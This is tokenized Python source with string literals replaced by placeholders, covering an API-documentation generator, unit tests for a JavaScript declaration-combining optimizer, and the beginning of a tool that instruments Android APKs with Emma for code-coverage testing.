classApi , linkMap [ sectionName ] , None ) <EOL> if section is None : <EOL> return '<STR_LIT>' % link <EOL> else : <EOL> if itemName in section : <EOL> return True <EOL> return '<STR_LIT>' % link <EOL> for sectionName in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> section = getattr ( classApi , sectionName , None ) <EOL> if section and itemName in section : <EOL> return True <EOL> return '<STR_LIT>' % link <EOL> def checkLinksInItem ( item ) : <EOL> if "<STR_LIT:type>" in item : <EOL> if item [ "<STR_LIT:type>" ] == "<STR_LIT>" : <EOL> if "<STR_LIT>" in item : <EOL> for paramName in item [ "<STR_LIT>" ] : <EOL> paramEntry = item [ "<STR_LIT>" ] [ paramName ] <EOL> if "<STR_LIT:type>" in paramEntry : <EOL> for paramTypeEntry in paramEntry [ "<STR_LIT:type>" ] : <EOL> if not paramTypeEntry [ "<STR_LIT:name>" ] in knownClasses and not paramTypeEntry [ "<STR_LIT:name>" ] in additionalTypes and not ( "<STR_LIT>" in paramTypeEntry or "<STR_LIT>" in paramTypeEntry ) : <EOL> item [ "<STR_LIT>" ] = True <EOL> Console . error ( '<STR_LIT>' % ( paramTypeEntry [ "<STR_LIT:name>" ] , className ) ) <EOL> if not "<STR_LIT>" in paramTypeEntry and paramTypeEntry [ "<STR_LIT:name>" ] in knownClasses : <EOL> paramTypeEntry [ "<STR_LIT>" ] = True <EOL> if "<STR_LIT>" in item : <EOL> for returnTypeEntry in item [ "<STR_LIT>" ] : <EOL> if not returnTypeEntry [ "<STR_LIT:name>" ] in knownClasses and not returnTypeEntry [ "<STR_LIT:name>" ] in additionalTypes and not ( "<STR_LIT>" in returnTypeEntry or "<STR_LIT>" in returnTypeEntry ) : <EOL> item [ "<STR_LIT>" ] = True <EOL> Console . error ( '<STR_LIT>' % ( returnTypeEntry [ "<STR_LIT:name>" ] , className ) ) <EOL> if not "<STR_LIT>" in returnTypeEntry and returnTypeEntry [ "<STR_LIT:name>" ] in knownClasses : <EOL> returnTypeEntry [ "<STR_LIT>" ] = True <EOL> elif not item [ "<STR_LIT:type>" ] in builtinTypes and not item [ "<STR_LIT:type>" ] in pseudoTypes and not item [ "<STR_LIT:type>" ] in additionalTypes : <EOL> item [ "<STR_LIT>" ] = True <EOL> Console . error ( '<STR_LIT>' % ( item [ "<STR_LIT:type>" ] , className ) ) <EOL> if "<STR_LIT>" in item : <EOL> def processInternalLink ( match ) : <EOL> linkUrl = match . group ( <NUM_LIT:2> ) <EOL> if linkUrl . startswith ( "<STR_LIT:#>" ) : <EOL> linkCheck = checkInternalLink ( linkUrl [ <NUM_LIT:1> : ] , className ) <EOL> if linkCheck is not True : <EOL> item [ "<STR_LIT>" ] = True <EOL> if sectionName : <EOL> Console . error ( "<STR_LIT>" % ( linkCheck , sectionName , className , name ) ) <EOL> else : <EOL> Console . error ( "<STR_LIT>" % ( linkCheck , className ) ) <EOL> linkExtract . sub ( processInternalLink , item [ "<STR_LIT>" ] ) <EOL> Console . indent ( ) <EOL> for className in apiData : <EOL> classApi = apiData [ className ] <EOL> sectionName = None <EOL> constructData = getattr ( classApi , "<STR_LIT>" , None ) <EOL> if constructData is not None : <EOL> checkLinksInItem ( constructData ) <EOL> for sectionName in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> section = getattr ( classApi , sectionName , None ) <EOL> if section is not None : <EOL> for name in section : <EOL> checkLinksInItem ( section [ name ] ) <EOL> Console . outdent ( ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> def isVisible ( entry ) : <EOL> if "<STR_LIT>" in entry : <EOL> visibility = entry [ "<STR_LIT>" ] <EOL> if visibility == "<STR_LIT>" and not privates : <EOL> return False <EOL> if visibility == "<STR_LIT>" and not internals : <EOL> return False <EOL> return True <EOL> def filterInternalsPrivates ( classApi , field ) : <EOL> data = getattr ( classApi , field , None ) <EOL> if data : <EOL> for name in list ( data ) : <EOL> if not isVisible ( data [ name ] ) : <EOL> del data [ name ] <EOL> for className in apiData : <EOL> filterInternalsPrivates ( apiData [ className ] , "<STR_LIT>" ) <EOL> filterInternalsPrivates ( apiData [ className ] , "<STR_LIT>" ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> for className in apiData : <EOL> classApi = getApi ( className ) <EOL> if not hasattr ( classApi , "<STR_LIT>" ) : <EOL> continue <EOL> classType = classApi . main [ "<STR_LIT:type>" ] <EOL> if classType == "<STR_LIT>" : <EOL> classImplements = getattr ( classApi , "<STR_LIT>" , None ) <EOL> if classImplements : <EOL> for interfaceName in classImplements : <EOL> interfaceApi = apiData [ interfaceName ] <EOL> implementedBy = getattr ( interfaceApi , "<STR_LIT>" , None ) <EOL> if not implementedBy : <EOL> implementedBy = interfaceApi . implementedBy = [ ] <EOL> implementedBy . append ( className ) <EOL> connectInterface ( className , interfaceName , classApi , interfaceApi ) <EOL> Console . outdent ( ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> for className in list ( apiData ) : <EOL> classApi = apiData [ className ] <EOL> destName = classApi . main [ "<STR_LIT:name>" ] <EOL> if destName is not None and destName != className : <EOL> Console . debug ( "<STR_LIT>" , destName , className ) <EOL> if destName in apiData : <EOL> destApi = apiData [ destName ] <EOL> destApi . main [ "<STR_LIT>" ] . append ( className ) <EOL> else : <EOL> destApi = apiData [ destName ] = Data . ApiData ( destName , highlight = highlightCode ) <EOL> destApi . main = { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : destName , <EOL> "<STR_LIT>" : [ className ] <EOL> } <EOL> if "<STR_LIT>" in classApi . main and classApi . main [ "<STR_LIT>" ] is not None and "<STR_LIT>" in classApi . main [ "<STR_LIT>" ] : <EOL> if "<STR_LIT>" in classApi . main : <EOL> destApi . main [ "<STR_LIT>" ] = classApi . main [ "<STR_LIT>" ] <EOL> classApi . main [ "<STR_LIT>" ] = True <EOL> construct = getattr ( classApi , "<STR_LIT>" , None ) <EOL> statics = getattr ( classApi , "<STR_LIT>" , None ) <EOL> members = getattr ( classApi , "<STR_LIT>" , None ) <EOL> if construct is not None : <EOL> if hasattr ( destApi , "<STR_LIT>" ) : <EOL> Console . warn ( "<STR_LIT>" , destName , className ) <EOL> destApi . construct = copy . copy ( construct ) <EOL> if statics is not None : <EOL> if not hasattr ( destApi , "<STR_LIT>" ) : <EOL> destApi . statics = { } <EOL> for staticName in statics : <EOL> destApi . statics [ staticName ] = copy . copy ( statics [ staticName ] ) <EOL> destApi . statics [ staticName ] [ "<STR_LIT>" ] = className <EOL> destApi . statics [ staticName ] [ "<STR_LIT>" ] = "<STR_LIT>" % ( className , staticName ) <EOL> if members is not None : <EOL> if not hasattr ( destApi , "<STR_LIT>" ) : <EOL> destApi . members = { } <EOL> for memberName in members : <EOL> destApi . members [ memberName ] = copy . copy ( members [ memberName ] ) <EOL> destApi . members [ memberName ] [ "<STR_LIT>" ] = className <EOL> destApi . members [ memberName ] [ "<STR_LIT>" ] = "<STR_LIT>" % ( className , memberName ) <EOL> Console . outdent ( ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> allClasses = set ( list ( apiData ) ) <EOL> for className in apiData : <EOL> uses = apiData [ className ] . uses <EOL> cleanUses = set ( ) <EOL> for use in uses : <EOL> if use != className and use in allClasses : <EOL> cleanUses . add ( use ) <EOL> useEntry = apiData [ use ] <EOL> if not hasattr ( useEntry , "<STR_LIT>" ) : <EOL> useEntry . usedBy = set ( ) <EOL> useEntry . usedBy . add ( className ) <EOL> apiData [ className ] . uses = cleanUses <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> for className in sorted ( apiData ) : <EOL> classApi = apiData [ className ] <EOL> errors = [ ] <EOL> if isErrornous ( classApi . main ) : <EOL> errors . append ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : None , <EOL> "<STR_LIT>" : <NUM_LIT:1> <EOL> } ) <EOL> if hasattr ( classApi , "<STR_LIT>" ) : <EOL> if isErrornous ( classApi . construct ) : <EOL> errors . append ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : None , <EOL> "<STR_LIT>" : classApi . construct [ "<STR_LIT>" ] <EOL> } ) <EOL> for section in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> items = getattr ( classApi , section , { } ) <EOL> for itemName in items : <EOL> item = items [ itemName ] <EOL> if isErrornous ( item ) : <EOL> errors . append ( { <EOL> "<STR_LIT>" : itemMap [ section ] , <EOL> "<STR_LIT:name>" : itemName , <EOL> "<STR_LIT>" : item [ "<STR_LIT>" ] <EOL> } ) <EOL> if errors : <EOL> if printErrors : <EOL> Console . warn ( "<STR_LIT>" , className ) <EOL> errorsSorted = sorted ( errors , key = lambda entry : entry [ "<STR_LIT>" ] ) <EOL> if printErrors : <EOL> Console . indent ( ) <EOL> for entry in errorsSorted : <EOL> if entry [ "<STR_LIT:name>" ] : <EOL> Console . warn ( "<STR_LIT>" , entry [ "<STR_LIT>" ] , entry [ "<STR_LIT:name>" ] , entry [ "<STR_LIT>" ] ) <EOL> else : <EOL> Console . warn ( "<STR_LIT>" , entry [ "<STR_LIT>" ] , entry [ "<STR_LIT>" ] ) <EOL> Console . outdent ( ) <EOL> classApi . errors = errorsSorted <EOL> Console . outdent ( ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> search = { } <EOL> def addSearch ( classApi , field ) : <EOL> data = getattr ( classApi , field , None ) <EOL> if data : <EOL> for name in data : <EOL> if not name in search : <EOL> search [ name ] = set ( ) <EOL> search [ name ] . add ( className ) <EOL> for className in apiData : <EOL> classApi = apiData [ className ] <EOL> addSearch ( classApi , "<STR_LIT>" ) <EOL> addSearch ( classApi , "<STR_LIT>" ) <EOL> addSearch ( classApi , "<STR_LIT>" ) <EOL> addSearch ( classApi , "<STR_LIT>" ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> for className in sorted ( apiData ) : <EOL> classApi = apiData [ className ] <EOL> convertTags ( classApi . main ) <EOL> construct = getattr ( classApi , "<STR_LIT>" , None ) <EOL> if construct : <EOL> convertFunction ( construct ) <EOL> convertTags ( construct ) <EOL> for section in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> items = getattr ( classApi , section , None ) <EOL> if items : <EOL> sortedList = [ ] <EOL> for itemName in sorted ( items ) : <EOL> item = items [ itemName ] <EOL> item [ "<STR_LIT:name>" ] = itemName <EOL> if "<STR_LIT:type>" in item and item [ "<STR_LIT:type>" ] == "<STR_LIT>" : <EOL> convertFunction ( item ) <EOL> convertTags ( item ) <EOL> sortedList . append ( item ) <EOL> setattr ( classApi , section , sortedList ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> for project in self . __session . getProjects ( ) : <EOL> docs = project . getDocs ( ) <EOL> for packageName in docs : <EOL> if self . __isIncluded ( packageName , classFilter ) : <EOL> Console . debug ( "<STR_LIT>" , packageName ) <EOL> apiData [ packageName ] = docs [ packageName ] . getApi ( ) <EOL> for className in sorted ( apiData ) : <EOL> splits = className . split ( "<STR_LIT:.>" ) <EOL> packageName = splits [ <NUM_LIT:0> ] <EOL> for split in splits [ <NUM_LIT:1> : ] : <EOL> if not packageName in apiData : <EOL> Console . warn ( "<STR_LIT>" , packageName ) <EOL> apiData [ packageName ] = Data . ApiData ( packageName , highlight = highlightCode ) <EOL> apiData [ packageName ] . main = { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : packageName <EOL> } <EOL> packageName = "<STR_LIT>" % ( packageName , split ) <EOL> for className in sorted ( apiData ) : <EOL> splits = className . split ( "<STR_LIT:.>" ) <EOL> packageName = "<STR_LIT:.>" . join ( splits [ : - <NUM_LIT:1> ] ) <EOL> if packageName : <EOL> package = apiData [ packageName ] <EOL> entry = { <EOL> "<STR_LIT:name>" : splits [ - <NUM_LIT:1> ] , <EOL> "<STR_LIT>" : className , <EOL> } <EOL> classMain = apiData [ className ] . main <EOL> if "<STR_LIT>" in classMain and classMain [ "<STR_LIT>" ] : <EOL> summary = Text . extractSummary ( classMain [ "<STR_LIT>" ] ) <EOL> if summary : <EOL> entry [ "<STR_LIT>" ] = summary <EOL> if "<STR_LIT:type>" in classMain and classMain [ "<STR_LIT:type>" ] : <EOL> entry [ "<STR_LIT:type>" ] = classMain [ "<STR_LIT:type>" ] <EOL> if not hasattr ( package , "<STR_LIT:content>" ) : <EOL> package . content = [ entry ] <EOL> else : <EOL> package . content . append ( entry ) <EOL> Console . outdent ( ) <EOL> Console . debug ( "<STR_LIT>" ) <EOL> index = { } <EOL> for className in sorted ( apiData ) : <EOL> classApi = apiData [ className ] <EOL> mainInfo = classApi . main <EOL> current = index <EOL> for split in className . split ( "<STR_LIT:.>" ) : <EOL> if not split in current : <EOL> current [ split ] = { } <EOL> current = current [ split ] <EOL> current [ "<STR_LIT>" ] = mainInfo [ "<STR_LIT:type>" ] <EOL> if hasattr ( classApi , "<STR_LIT:content>" ) : <EOL> current [ "<STR_LIT>" ] = True <EOL> return apiData , index , search </s>
<s> import sys , os , unittest , logging <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> jasyroot = os . path . normpath ( os . path . join ( os . path . abspath ( sys . argv [ <NUM_LIT:0> ] ) , os . pardir , os . pardir , os . pardir , os . pardir ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , jasyroot ) <EOL> print ( "<STR_LIT>" % jasyroot ) <EOL> import jasy . js . parse . Parser as Parser <EOL> import jasy . js . parse . ScopeScanner as ScopeScanner <EOL> import jasy . js . output . Compressor as Compressor <EOL> import jasy . js . optimize . CombineDeclarations as CombineDeclarations <EOL> class Tests ( unittest . TestCase ) : <EOL> def process ( self , code ) : <EOL> node = Parser . parse ( code ) <EOL> ScopeScanner . scan ( node ) <EOL> CombineDeclarations . optimize ( node ) <EOL> return Compressor . Compressor ( ) . compress ( node ) <EOL> def test_combine_basic ( self ) : <EOL> self . assertEqual ( self . process ( <EOL> '''<STR_LIT>''' ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_combine_closure_innerfirst ( self ) : <EOL> self . assertEqual ( self . process ( <EOL> '''<STR_LIT>''' ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_combine_closure ( self ) : <EOL> self . assertEqual ( self . process ( <EOL> '''<STR_LIT>''' ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_combine_complex ( self ) : <EOL> self . assertEqual ( self . process ( <EOL> '''<STR_LIT>''' ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_combine_destruct_assign ( self ) : <EOL> self . assertEqual ( self . process ( <EOL> '''<STR_LIT>''' ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_combine_destruct ( self ) : <EOL> self . assertEqual ( self . process ( <EOL> '''<STR_LIT>''' ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_combine_doubles ( self ) : <EOL> self . assertEqual ( self . process ( <EOL> '''<STR_LIT>''' ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_combine_doubles_break ( self ) : <EOL> self . assertEqual ( self . process ( <EOL> '''<STR_LIT>''' ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_combine_doubles_for ( self ) : <EOL> self . assertEqual ( self . process ( <EOL> '''<STR_LIT>''' ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_combine_doubles_oneassign ( self ) : <EOL> self . assertEqual ( self . process ( <EOL> '''<STR_LIT>''' ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> logging . getLogger ( ) . setLevel ( logging . ERROR ) <EOL> suite = unittest . TestLoader ( ) . loadTestsFromTestCase ( Tests ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( suite ) </s>
<s> '''<STR_LIT>''' <EOL> import os , sys , shutil <EOL> import ConfigParser <EOL> from bbox_core . bbox_config import BBoxConfig <EOL> from utils . state_machine import StateMachine <EOL> from utils import apk_utils , auxiliary_utils , zip_utils <EOL> from bbox_core . bboxreporter import MsgException , BBoxReporter <EOL> from bbox_core . bboxinstrumenter import BBoxInstrumenter , ApkCannotBeDecompiledException , Dex2JarConvertionError , EmmaCannotInstrumentException , Jar2DexConvertionError , IllegalArgumentException , ApktoolBuildException , SignApkException , AlignApkException <EOL> from bbox_core . bboxexecutor import BBoxExecutor , ApkCannotBeInstalledException <EOL> from logconfig import logger <EOL> from string import rfind <EOL> from utils . android_manifest import AndroidManifest <EOL> from time import localtime <EOL> import datetime <EOL> from interfaces . emma_interface import EMMA_REPORT <EOL> import time <EOL> from six import iteritems <EOL> RESULTS_RELATIVE_DIR = "<STR_LIT>" <EOL> TMP_RELATIVE_DIR = "<STR_LIT>" <EOL> DEVICE_REPORT_FOLDER_PATH = "<STR_LIT>" <EOL> PARAMS_SECTION = "<STR_LIT>" <EOL> STATE_UNINITIALIZED = "<STR_LIT>" <EOL> STATE_APK_VALID = "<STR_LIT>" <EOL> STATE_FOLDERS_CREATED = "<STR_LIT>" <EOL> STATE_APK_DECOMPILED = "<STR_LIT>" <EOL> STATE_DEX_CONVERTED_TO_JAR = "<STR_LIT>" <EOL> STATE_JARS_INSTRUMENTED = "<STR_LIT>" <EOL> STATE_JAR_CONVERTED_TO_DEX = "<STR_LIT>" <EOL> STATE_MANIFEST_INSTRUMENTED = "<STR_LIT>" <EOL> STATE_INSTRUMENTED_APK_BUILD = "<STR_LIT>" <EOL> STATE_FINAL_INSTRUMENTED_APK_BUILD = "<STR_LIT>" <EOL> STATE_INSTRUMENTED_APK_SIGNED = "<STR_LIT>" <EOL> STATE_INSTRUMENTED_APK_ALIGNED = "<STR_LIT>" <EOL> STATE_APK_INSTRUMENTED = "<STR_LIT>" <EOL> STATE_VALID_SETTINGS_PROVIDED = "<STR_LIT>" <EOL> STATE_APK_INSTALLED = "<STR_LIT>" <EOL> STATE_APK_TEST_STARTED = "<STR_LIT>" <EOL> STATE_APK_FINISHED_TESTING = "<STR_LIT>" <EOL> STATES = [ ( STATE_UNINITIALIZED , STATE_APK_VALID ) , <EOL> ( STATE_APK_VALID , STATE_FOLDERS_CREATED ) , <EOL> ( STATE_FOLDERS_CREATED , STATE_APK_DECOMPILED ) , <EOL> ( STATE_APK_DECOMPILED , STATE_DEX_CONVERTED_TO_JAR ) , <EOL> ( STATE_DEX_CONVERTED_TO_JAR , STATE_JARS_INSTRUMENTED ) , <EOL> ( STATE_JARS_INSTRUMENTED , STATE_JAR_CONVERTED_TO_DEX ) , <EOL> ( STATE_JAR_CONVERTED_TO_DEX , STATE_MANIFEST_INSTRUMENTED ) , <EOL> ( STATE_MANIFEST_INSTRUMENTED , STATE_INSTRUMENTED_APK_BUILD ) , <EOL> ( STATE_INSTRUMENTED_APK_BUILD , STATE_FINAL_INSTRUMENTED_APK_BUILD ) , <EOL> ( STATE_FINAL_INSTRUMENTED_APK_BUILD , STATE_INSTRUMENTED_APK_SIGNED ) , <EOL> ( STATE_INSTRUMENTED_APK_SIGNED , STATE_INSTRUMENTED_APK_ALIGNED ) , <EOL> ( STATE_INSTRUMENTED_APK_ALIGNED , STATE_APK_INSTRUMENTED ) , <EOL> ( STATE_APK_INSTRUMENTED , STATE_APK_INSTALLED ) , <EOL> ( STATE_VALID_SETTINGS_PROVIDED , STATE_APK_INSTALLED ) , <EOL> ( STATE_APK_INSTRUMENTED , STATE_APK_TEST_STARTED ) , <EOL> ( STATE_VALID_SETTINGS_PROVIDED , STATE_APK_TEST_STARTED ) , <EOL> ( STATE_APK_INSTALLED , STATE_APK_TEST_STARTED ) , <EOL> ( STATE_APK_TEST_STARTED , STATE_APK_FINISHED_TESTING ) , <EOL> ] <EOL> class BBoxCoverage : <EOL> PREFIX_ONSTOP = "<STR_LIT>" ; <EOL> PREFIX_ONERROR = "<STR_LIT>" ; <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , pathToBBoxConfigFile = "<STR_LIT>" ) : <EOL> self . androidManifestFile = None <EOL> self . instrumentedApk = None <EOL> self . config = BBoxConfig ( pathToBBoxConfigFile ) <EOL> self . bboxInstrumenter = BBoxInstrumenter ( self . config ) <EOL> self . bboxExecutor = BBoxExecutor ( self . config ) <EOL> self . bboxReporter = BBoxReporter ( self . config ) <EOL> self . _bboxStateMachine = StateMachine ( states = STATES ) <EOL> def getInstrumentedApk ( self ) : <EOL> return self . instrumentedApk <EOL> def getPackageName ( self ) : <EOL> return self . packageName <EOL> def instrumentApkForCoverage ( self , pathToOrigApk , resultsDir = None , tmpDir = None , <EOL> removeApkTmpDirAfterInstr = True , <EOL> copyApkToRes = True ) : <EOL> '''<STR_LIT>''' <EOL> self . _bboxStateMachine . start ( STATE_UNINITIALIZED ) <EOL> valid = self . _checkProvidedApk ( pathToOrigApk ) <EOL> if not valid : <EOL> return False <EOL> self . _bboxStateMachine . transitToState ( STATE_APK_VALID ) <EOL> resultsRootDir = None <EOL> if not resultsDir : <EOL> resultsRootDir = os . path . join ( os . getcwd ( ) , RESULTS_RELATIVE_DIR ) <EOL> else : <EOL> resultsRootDir = os . path . abspath ( resultsDir ) <EOL> tmpRootDir = None <EOL> if not tmpDir : <EOL> tmpRootDir = os . path . join ( os . getcwd ( ) , TMP_RELATIVE_DIR ) <EOL> else : <EOL> tmpRootDir = os . path . abspath ( tmpDir ) <EOL> apkFileName = os . path . splitext ( os . path . basename ( pathToOrigApk ) ) [ <NUM_LIT:0> ] <EOL> self . apkTmpDir = self . _createDir ( tmpDir , apkFileName , False , True ) <EOL> self . apkResultsDir = self . _createDir ( resultsRootDir , apkFileName , False , True ) <EOL> self . coverageMetadataFolder = self . _createDir ( self . apkResultsDir , self . config . getCoverageMetadataRelativeDir ( ) , False , True ) <EOL> self . runtimeReportsRootDir = self . _createDir ( self . apkResultsDir , self . config . getRuntimeReportsRelativeDir ( ) , False , True ) <EOL> self . _bboxStateMachine . transitToState ( STATE_FOLDERS_CREATED ) <EOL> if copyApkToRes : <EOL> shutil . copy2 ( pathToOrigApk , self . apkResultsDir ) <EOL> decompileDir = os . path . join ( self . apkTmpDir , self . config . getDecompiledApkRelativeDir ( ) ) <EOL> success = self . _decompileApk ( self . bboxInstrumenter , pathToOrigApk , decompileDir ) <EOL> if not success : <EOL> return False <EOL> self . _bboxStateMachine . transitToState ( STATE_APK_DECOMPILED ) <EOL> dexFilesRelativePaths = self . _getDexFilePathsRelativeToDir ( decompileDir ) <EOL> if not dexFilesRelativePaths : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> if "<STR_LIT>" not in dexFilesRelativePaths : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> rawJarFilesRootDir = os . path . join ( self . apkTmpDir , self . config . getTmpJarRelativeDir ( ) ) <EOL> jarFilesRelativePaths = self . _convertDex2JarFiles ( <EOL> converter = self . bboxInstrumenter , <EOL> dexFilesRootDir = decompileDir , <EOL> dexFilesRelativePaths = dexFilesRelativePaths , <EOL> jarFilesRootDir = rawJarFilesRootDir , <EOL> proceedOnError = True ) <EOL> self . _bboxStateMachine . transitToState ( STATE_DEX_CONVERTED_TO_JAR ) <EOL> if "<STR_LIT>" not in jarFilesRelativePaths : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> self . coverageMetadataFile = os . path . join ( self . coverageMetadataFolder , self . config . getCoverageMetadataFilename ( ) ) <EOL> emmaInstrJarFilesRootDir = os . path . join ( self . apkTmpDir , self . config . getInstrumentedFilesRelativeDir ( ) ) <EOL> emmaInstrJarFileRelativePaths = self . _instrFilesWithEmma ( <EOL> instrumenter = self . bboxInstrumenter , <EOL> jarFilesRootDir = rawJarFilesRootDir , <EOL> jarFilesRelativePaths = jarFilesRelativePaths , <EOL> instrJarsRootDir = emmaInstrJarFilesRootDir , <EOL> coverageMetadataFile = self . coverageMetadataFile , <EOL> proceedOnError = True ) <EOL> self . _bboxStateMachine . transitToState ( STATE_JARS_INSTRUMENTED ) <EOL> if "<STR_LIT>" not in emmaInstrJarFileRelativePaths : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> instrDexFilesRelativePaths = self . _convertJar2DexWithInstr ( <EOL> converter = self . bboxInstrumenter , <EOL> instrJarsRootDir = emmaInstrJarFilesRootDir , <EOL> instrJarFilesRelativePaths = emmaInstrJarFileRelativePaths , <EOL> finalDexFilesRootDir = decompileDir , <EOL> proceedOnError = True ) <EOL> self . _bboxStateMachine . transitToState ( STATE_JAR_CONVERTED_TO_DEX ) <EOL> if "<STR_LIT>" not in instrDexFilesRelativePaths : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> uninstrumentedFiles = self . _getUnInstrFilesRelativePaths ( dexFilesRelativePaths , instrDexFilesRelativePaths ) <EOL> if uninstrumentedFiles : <EOL> logger . debug ( "<STR_LIT>" + str ( uninstrumentedFiles ) ) <EOL> decompiledAndroidManifestPath = os . path . join ( decompileDir , "<STR_LIT>" ) <EOL> success = self . _instrAndroidManifest ( self . bboxInstrumenter , decompiledAndroidManifestPath ) <EOL> if not success : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> shutil . copy2 ( decompiledAndroidManifestPath , self . apkResultsDir ) <EOL> self . androidManifestFile = os . path . join ( self . apkResultsDir , "<STR_LIT>" ) <EOL> self . _bboxStateMachine . transitToState ( STATE_MANIFEST_INSTRUMENTED ) <EOL> compiledApkFilePath = os . path . join ( self . apkResultsDir , "<STR_LIT>" % ( apkFileName , self . config . getInstrFileSuffix ( ) ) ) <EOL> success = self . _compileApk ( self . bboxInstrumenter , decompileDir , compiledApkFilePath ) <EOL> if not success : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> self . _bboxStateMachine . transitToState ( STATE_INSTRUMENTED_APK_BUILD ) <EOL> compiledApkFilePathWithEmmaRes = os . path . join ( self . apkResultsDir , "<STR_LIT>" % ( apkFileName , self . config . getFinalInstrFileSuffix ( ) ) ) <EOL> shutil . copy2 ( compiledApkFilePath , compiledApkFilePathWithEmmaRes ) <EOL> self . _putAdditionalResources ( apk = compiledApkFilePathWithEmmaRes , resources = self . config . getEmmaResourcesDir ( ) ) <EOL> self . _bboxStateMachine . transitToState ( STATE_FINAL_INSTRUMENTED_APK_BUILD ) <EOL> signedApkFilePath = os . path . join ( self . apkResultsDir , "<STR_LIT>" % ( apkFileName , self . config . getSignedFileSuffix ( ) ) ) <EOL> success = self . _signApk ( self . bboxInstrumenter , compiledApkFilePathWithEmmaRes , signedApkFilePath ) <EOL> if not success : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> self . _bboxStateMachine . transitToState ( STATE_INSTRUMENTED_APK_SIGNED ) <EOL> alignedApkFilePath = os . path . join ( self . apkResultsDir , "<STR_LIT>" % ( apkFileName , self . config . getAlignedFileSuffix ( ) ) ) <EOL> success = self . _alignApk ( self . bboxInstrumenter , signedApkFilePath , alignedApkFilePath ) <EOL> if not success : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> self . _bboxStateMachine . transitToState ( STATE_INSTRUMENTED_APK_ALIGNED ) <EOL> if removeApkTmpDirAfterInstr : <EOL> shutil . rmtree ( self . apkTmpDir ) <EOL> self . instrumentedApk = alignedApkFilePath <EOL> self . androidManifest = AndroidManifest ( self . androidManifestFile ) <EOL> self . packageName = self . androidManifest . getInstrumentationTargetPackage ( ) <EOL> self . runnerName = self . androidManifest . getInstrumentationRunnerName ( ) <EOL> self . _bboxStateMachine . transitToState ( STATE_APK_INSTRUMENTED ) <EOL> return True <EOL> def _createDir ( self , root , directory , createNew = True , overwrite = False ) : <EOL> resDir = os . path . join ( root , directory ) <EOL> if createNew : <EOL> i = <NUM_LIT:0> <EOL> while os . path . exists ( resDir ) : <EOL> i += <NUM_LIT:1> <EOL> resDir = os . path . join ( root , "<STR_LIT>" % ( directory , i ) ) <EOL> auxiliary_utils . mkdir ( path = resDir , mode = <NUM_LIT:0> <NUM_LIT> , overwrite = overwrite ) <EOL> return resDir <EOL> def _createFolder ( self , root , dirName , overwrite = False ) : <EOL> resultDir = os . path . join ( root , dirName ) <EOL> auxiliary_utils . mkdir ( path = resultDir , mode = <NUM_LIT:0> <NUM_LIT> , overwrite = overwrite ) <EOL> return resultDir <EOL> def _checkProvidedApk ( self , pathToApk ) : <EOL> '''<STR_LIT>''' <EOL> ( valid , error ) = apk_utils . checkInputApkFile ( pathToApk ) <EOL> if not valid : <EOL> logger . error ( "<STR_LIT>" % ( pathToApk , error ) ) <EOL> return valid <EOL> return valid <EOL> def _decompileApk ( self , decompiler , apk , outputDir ) : <EOL> try : <EOL> decompiler . decompileApk ( apk , outputDir ) <EOL> except ApkCannotBeDecompiledException as e : <EOL> logger . error ( e . msg ) <EOL> return False <EOL> except : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> return True <EOL> def _convertDex2JarFiles ( self , converter , dexFilesRootDir , dexFilesRelativePaths , jarFilesRootDir , proceedOnError = True ) : <EOL> jarFilesRelativePaths = [ ] <EOL> for dexFileRelativePath in dexFilesRelativePaths : <EOL> dexFilePath = os . path . join ( dexFilesRootDir , dexFileRelativePath ) <EOL> jarFileRelativePath = os . path . splitext ( dexFileRelativePath ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> jarFilePath = os . path . join ( jarFilesRootDir , jarFileRelativePath ) <EOL> try : <EOL> converter . convertDex2Jar ( dexFilePath , jarFilePath , overwrite = True ) <EOL> except Dex2JarConvertionError as e : <EOL> if proceedOnError : <EOL> logger . warning ( 